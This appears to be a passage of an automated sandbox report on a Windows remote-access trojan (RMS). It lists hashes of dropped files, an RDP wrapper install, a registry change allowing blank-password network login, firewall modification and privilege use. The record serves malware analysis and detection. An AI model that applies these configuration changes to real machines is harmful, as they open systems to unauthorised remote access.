SHA1 1ff3ac690d6ff39639699d373314291b4a797393
SHA256 74974af03632e5770fbb5e68bae28d71398ba32b018b35fb9e5c85788fa1008c
SHA512 1bfcb20ee8b11e08e4865162050379d220e647dddef811b93945fe7b47939de000e104ff3365b737fcee8752a08d04ba7130e94e2ec6e576442eb4b758ad047f

C:\Program Files\CardWindows\MSIDrvs.exe

MD5 fcc39072590b72de6f9c8e0559155fd6
SHA1 1ff3ac690d6ff39639699d373314291b4a797393
SHA256 74974af03632e5770fbb5e68bae28d71398ba32b018b35fb9e5c85788fa1008c
SHA512 1bfcb20ee8b11e08e4865162050379d220e647dddef811b93945fe7b47939de000e104ff3365b737fcee8752a08d04ba7130e94e2ec6e576442eb4b758ad047f

C:\Program Files\CardWindows\MSIDrvs.exe

MD5 fcc39072590b72de6f9c8e0559155fd6
SHA1 1ff3ac690d6ff39639699d373314291b4a797393
SHA256 74974af03632e5770fbb5e68bae28d71398ba32b018b35fb9e5c85788fa1008c
SHA512 1bfcb20ee8b11e08e4865162050379d220e647dddef811b93945fe7b47939de000e104ff3365b737fcee8752a08d04ba7130e94e2ec6e576442eb4b758ad047f

C:\Program Files\CardWindows\MSIDrvs.exe

MD5 fcc39072590b72de6f9c8e0559155fd6
SHA1 1ff3ac690d6ff39639699d373314291b4a797393
SHA256 74974af03632e5770fbb5e68bae28d71398ba32b018b35fb9e5c85788fa1008c
SHA512 1bfcb20ee8b11e08e4865162050379d220e647dddef811b93945fe7b47939de000e104ff3365b737fcee8752a08d04ba7130e94e2ec6e576442eb4b758ad047f

C:\Program Files\CardWindows\MSIDrvs.exe

MD5 fcc39072590b72de6f9c8e0559155fd6
SHA1 1ff3ac690d6ff39639699d373314291b4a797393
SHA256 74974af03632e5770fbb5e68bae28d71398ba32b018b35fb9e5c85788fa1008c
SHA512 1bfcb20ee8b11e08e4865162050379d220e647dddef811b93945fe7b47939de000e104ff3365b737fcee8752a08d04ba7130e94e2ec6e576442eb4b758ad047f

C:\Program Files\CardWindows\MSIDrvs.exe

MD5 fcc39072590b72de6f9c8e0559155fd6
SHA1 1ff3ac690d6ff39639699d373314291b4a797393
SHA256 74974af03632e5770fbb5e68bae28d71398ba32b018b35fb9e5c85788fa1008c
SHA512 1bfcb20ee8b11e08e4865162050379d220e647dddef811b93945fe7b47939de000e104ff3365b737fcee8752a08d04ba7130e94e2ec6e576442eb4b758ad047f

C:\Program Files\CardWindows\vp8decoder.dll

MD5 d43fa82fab5337ce20ad14650085c5d9
SHA1 678aa092075ff65b6815ffc2d8fdc23af8425981
SHA256 c022958429edd94bfe31f2eacfe24ff6b45d6f12747725c449a36116373de03b
SHA512 103e61a9f58df03316676a074487e50ec518479c11068df3736df139b85c7671048c65bce0ef2c55b3c50c61fde54e9e6c7d1b795aea71263ae94c91d4874e0d

C:\Program Files\CardWindows\SystemDrvs.exe

MD5 0bc376498b56d88341bd711ad4b823d2
SHA1 d96d9566628786bd40768949ec6f9b67ade357eb
SHA256 8929fa37860921d1f43eec6192876e6e6daf82d2013aeb08e0285ac5456fd52a
SHA512 64b5f671afe8186adf7930bafce7ccb4c3378a47ceb330aa0dfe36e34cfc6bcba8742497f721395292185864541d618affe6040961f90c5b663c914c93f33656

C:\Program Files\CardWindows\vp8encoder.dll

MD5 dab4646806dfca6d0e0b4d80fa9209d6
SHA1 8244dfe22ec2090eee89dad103e6b2002059d16a
SHA256 cb6ef96d3a66ef08ec2c8640b751a52d6d4f4530cf01162a69966f0fd5153587
SHA512 aa5eb93bf23a10de797d6fb52a55a95d36bc48927c76fedd81e0c48872745cb7f7d1b3f230eaae42fd4e79b6a59ca707e56bd6963b03644cbd5984f11e98d6e7

memory/2020-72-0x00000000001C0000-0x00000000001C1000-memory.dmp

memory/916-71-0x0000000000230000-0x0000000000231000-memory.dmp

C:\Program Files\CardWindows\SystemDrvs.exe

MD5 0bc376498b56d88341bd711ad4b823d2
SHA1 d96d9566628786bd40768949ec6f9b67ade357eb
SHA256 8929fa37860921d1f43eec6192876e6e6daf82d2013aeb08e0285ac5456fd52a
SHA512 64b5f671afe8186adf7930bafce7ccb4c3378a47ceb330aa0dfe36e34cfc6bcba8742497f721395292185864541d618affe6040961f90c5b663c914c93f33656

C:\Program Files\CardWindows\SystemDrvs.exe

MD5 0bc376498b56d88341bd711ad4b823d2
SHA1 d96d9566628786bd40768949ec6f9b67ade357eb
SHA256 8929fa37860921d1f43eec6192876e6e6daf82d2013aeb08e0285ac5456fd52a
SHA512 64b5f671afe8186adf7930bafce7ccb4c3378a47ceb330aa0dfe36e34cfc6bcba8742497f721395292185864541d618affe6040961f90c5b663c914c93f33656

\Program Files\CardWindows\SystemDrvs.exe

MD5 0bc376498b56d88341bd711ad4b823d2
SHA1 d96d9566628786bd40768949ec6f9b67ade357eb
SHA256 8929fa37860921d1f43eec6192876e6e6daf82d2013aeb08e0285ac5456fd52a
SHA512 64b5f671afe8186adf7930bafce7ccb4c3378a47ceb330aa0dfe36e34cfc6bcba8742497f721395292185864541d618affe6040961f90c5b663c914c93f33656

\Program Files\CardWindows\SystemDrvs.exe

MD5 0bc376498b56d88341bd711ad4b823d2
SHA1 d96d9566628786bd40768949ec6f9b67ade357eb
SHA256 8929fa37860921d1f43eec6192876e6e6daf82d2013aeb08e0285ac5456fd52a
SHA512 64b5f671afe8186adf7930bafce7ccb4c3378a47ceb330aa0dfe36e34cfc6bcba8742497f721395292185864541d618affe6040961f90c5b663c914c93f33656

\Program Files\CardWindows\sys.exe

MD5 faf1fc3b0b4e42ab038677f1168fbf17
SHA1 5e04f80934853f0552079c27b7d2fd6e62dd1b3c
SHA256 a262cec7448e5db073fc858f5f7e6c871460e8853a12a34f96d3cce95eebf109
SHA512 74f2dd08e0f3c1d9b44c104abae62b31d1d49c4e1e7e5a15b11154dd1cae10280adb93e202a62e7772d617d5d3154e1a61bb11a9e929fb2610a6ed8a0a7f80e2

C:\Program Files\CardWindows\sys.exe

MD5 faf1fc3b0b4e42ab038677f1168fbf17
SHA1 5e04f80934853f0552079c27b7d2fd6e62dd1b3c
SHA256 a262cec7448e5db073fc858f5f7e6c871460e8853a12a34f96d3cce95eebf109
SHA512 74f2dd08e0f3c1d9b44c104abae62b31d1d49c4e1e7e5a15b11154dd1cae10280adb93e202a62e7772d617d5d3154e1a61bb11a9e929fb2610a6ed8a0a7f80e2

memory/1680-82-0x0000000000400000-0x00000000009B7003-memory.dmp

memory/1680-85-0x0000000000401000-0x0000000000797000-memory.dmp

memory/1232-86-0x0000000000230000-0x0000000000231000-memory.dmp

memory/1048-88-0x0000000000230000-0x0000000000231000-memory.dmp

memory/1680-89-0x0000000000370000-0x0000000000373000-memory.dmp

memory/1680-90-0x0000000000360000-0x0000000000366000-memory.dmp

memory/1680-91-0x00000000002D0000-0x000000000031B000-memory.dmp

C:\Windows\run.bat

MD5 93a098e3701bf40042a0e51d3a125b31
SHA1 2dcbf75b8d8bba7830aa363c1e56560e552c726a
SHA256 8a0c16ab6f2b5af74b62fe041b8bc1ddf8dc03fb713c5bb30beceba307bb1269
SHA512 06d97a68fc971bc5c739f5da10a172c2279b9158b994d78b7eb60fff6e484c118b70631df788557a213f26baae00cde9ed7e176b1495c5d2ec74099a7fa3fa12

memory/1680-93-0x000000007EFA0000-0x000000007EFA1000-memory.dmp

C:\Windows\RDPWInst.exe

MD5 9c257b1d15817a818a675749f0429130
SHA1 234d14da613c1420ea17de60ab8c3621d1599f6f
SHA256 b92962c2b4794ee418f0248743131d472a10ac96e520dda2afddf8ca3f3cd64c
SHA512 b63fb6ba7b622f95fc151ca62c339368991c3c4c22e4bbe2305ac7172ee3f10e5049850e87cf3b87a13f4f15c516fbd20cadde9197064b659ffc66599e71d521

C:\Windows\RDPWInst.exe

MD5 9c257b1d15817a818a675749f0429130
SHA1 234d14da613c1420ea17de60ab8c3621d1599f6f
SHA256 b92962c2b4794ee418f0248743131d472a10ac96e520dda2afddf8ca3f3cd64c
SHA512 b63fb6ba7b622f95fc151ca62c339368991c3c4c22e4bbe2305ac7172ee3f10e5049850e87cf3b87a13f4f15c516fbd20cadde9197064b659ffc66599e71d521

C:\Program Files\CardWindows\SystemDrvs.exe

MD5 0bc376498b56d88341bd711ad4b823d2
SHA1 d96d9566628786bd40768949ec6f9b67ade357eb
SHA256 8929fa37860921d1f43eec6192876e6e6daf82d2013aeb08e0285ac5456fd52a
SHA512 64b5f671afe8186adf7930bafce7ccb4c3378a47ceb330aa0dfe36e34cfc6bcba8742497f721395292185864541d618affe6040961f90c5b663c914c93f33656

\Program Files\RDP Wrapper\rdpwrap.dll

MD5 461ade40b800ae80a40985594e1ac236
SHA1 b3892eef846c044a2b0785d54a432b3e93a968c8
SHA256 798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
SHA512 421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

memory/1108-101-0x000007FEFB771000-0x000007FEFB773000-memory.dmp

C:\Windows\RDPWInst.exe

MD5 9c257b1d15817a818a675749f0429130
SHA1 234d14da613c1420ea17de60ab8c3621d1599f6f
SHA256 b92962c2b4794ee418f0248743131d472a10ac96e520dda2afddf8ca3f3cd64c
SHA512 b63fb6ba7b622f95fc151ca62c339368991c3c4c22e4bbe2305ac7172ee3f10e5049850e87cf3b87a13f4f15c516fbd20cadde9197064b659ffc66599e71d521

C:\Program Files\RDP Wrapper\rdpwrap.ini

MD5 dddd741ab677bdac8dcd4fa0dda05da2
SHA1 69d328c70046029a1866fd440c3e4a63563200f9
SHA256 7d5655d5ec4defc2051aa5f582fac1031b142040c8eea840ff88887fe27b7668
SHA512 6106252c718f7ca0486070c6f6c476bd47e6ae6a799cffd3fb437a5ce2b2a904e9cbe17342351353c594d7a8ae0ef0327752ff977dee1e69f0be7dc8e55cf4ec

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB

MD5 8781fe5562b050b7112db570d6104140
SHA1 f566841fa04fbb13d1a505a1dcfd1040fef87203
SHA256 9647145d4205efe8a2b114d27070c81d147eeb42eed917495a97c9ce96540bdc
SHA512 cef13a45244f5d8d9285a7b797ff7b73155e034628d0eab81163de2c175a759ddf36d2060f5dffee499778d0be1059c1f0e9305a38f47457886b289f6275f272

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB

MD5 a8cece8975329aad2549d1f73ab385e8
SHA1 02f2247f70d2765756df2d084508e0a96e567cfa
SHA256 7d9b6778d972fbb7a92bd5e0f65eea87182d2a74aa66fa234a4063441c05e395
SHA512 c55fed606f1788c8ac7c5389ea3bd0bf3a3b5ffed0c0e8ceb6dff3c251c1438106dbd7abaa7417c54a1b33efd2fb12155facd7d289af9a8b3995e7918efc811e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c92647e39d2657bb568f6781875d7268
SHA1 4db1eea108282a9e4687dedf6160586e9dae1b62
SHA256 1b570cfc56aec0e1f8dd793bc8cce8686ef8f4dfb6e3506c7e7e0b6f0bfb4780
SHA512 d7c4b6e023f817ba00fd3fd83a60ddd4baf16a677b55174c91936382e2bf15d38a738bc3204f39a99080da2cfcdfc4099f1089776e40025923c86dd6d71a470a

C:\Program Files\CardWindows\service.bat

MD5 d464405315d8b051c5f101a7035eff0c
SHA1 f9fefd04bb0f04d2b7fbac73efac8130a264fc6b
SHA256 e54649f33d7b149073e457e5c4b78767433b05f8220245f8ee2c7ad44685ed10
SHA512 6e0daab678a3ace2c437702241daee277d4b2bed86bf953fa33089ce3654402415d2401d15740b6ae2077289c87550f50750c0d33e415999e3df27b5fc40350a

Analysis: behavioral2

Detonation Overview

Submitted

2022-02-13 09:46

Reported

2022-02-13 09:49

Platform

win10v2004-en-20220112

Max time kernel

162s

Max time network

161s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe"

Signatures

RMS

trojan rat rms

Modifies Windows Firewall

evasion

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Allows Network login with blank passwords

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\limitblankpassworduse = "0" C:\Windows\SysWOW64\reg.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\RDPCheck.exe C:\Program Files\CardWindows\sys.exe N/A
File created C:\Windows\RDPSetup.exe C:\Program Files\CardWindows\sys.exe N/A
File created C:\Windows\RDPWInst.exe C:\Program Files\CardWindows\sys.exe N/A
File opened for modification C:\Windows\Logs\CBS\CBS.log C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
File opened for modification C:\Windows\WinSxS\pending.xml C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
File created C:\Windows\RDPConf.exe C:\Program Files\CardWindows\sys.exe N/A
File created C:\Windows\run.bat C:\Program Files\CardWindows\sys.exe N/A
File created C:\Windows\run.exe C:\Program Files\CardWindows\sys.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\keyValueLKG.dat C:\Windows\System32\svchost.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\MusNotifyIcon.exe N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\MusNotifyIcon.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "6.666072" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyInternetBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCdnBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrBps = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkBps = "0" C:\Windows\System32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\Geo_EndpointFullUri = "https://geo.prod.do.dsp.mp.microsoft.com/geo" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CDNConnectionCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\InternetConnectionCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyLanBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4180" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CacheSizeBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LinkLocalConnectionCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkBps = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DODownloadMode = "1" C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\GroupConnectionCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCacheHostBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkUsageBps = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadRatePct = "100" C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyInternetBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLanBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrCnt = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "1" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkUsageBps = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\FrDownloadRatePct = "90" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "2.209983" C:\Windows\System32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "0.000000" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4316" C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLinkLocalBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\GeoVersion_EndpointFullUri = "https://geover.prod.do.dsp.mp.microsoft.com/geoversion" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\BkDownloadRatePct = "45" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadPendingCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkBps = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DownloadMode_BackCompat = "1" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyGroupBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkCnt = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthID = "2" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\KVFileExpirationTime = "132893956823456449" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PeerInfoCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LANConnectionCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthlyUploadRestriction = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadPendingCount = "0" C:\Windows\System32\svchost.exe N/A

Runs .reg file with regedit

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A
Token: SeTcbPrivilege N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A
Token: SeTcbPrivilege N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
